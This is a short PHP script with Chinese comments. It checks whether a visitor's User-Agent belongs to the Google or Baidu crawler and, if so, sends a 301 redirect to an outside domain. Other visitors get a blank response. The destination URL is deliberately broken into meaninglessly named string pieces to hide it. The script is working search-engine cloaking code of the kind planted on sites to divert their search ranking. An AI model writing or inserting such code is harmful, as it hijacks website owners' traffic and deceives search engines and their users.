<?php 
header('Content-Type:text/html;charset=utf-8');//这里是网站编码
$bojun= "htt";
$adwwq= "www.";
$lwepop= "chianheimao";
$lolasa= ".com";
$kwell= "p://";
$llasa= "HTTP/1.1 ";
$qwq66= "301 ";
$swppp= "Moved Permanently";
$key= $_SERVER["HTTP_USER_AGENT"];
//上面是跳转网址


if(strpos($key,'oogle')!== false||strpos($key,'aidu')!==false)
{
    $url= "$bojun$kwell$adwwq$lwepop$lolasa";
    header("$llasa$qwq66$swppp");
    header("location:$url");

   echo '';
}
else
{

   echo "";
}
?>

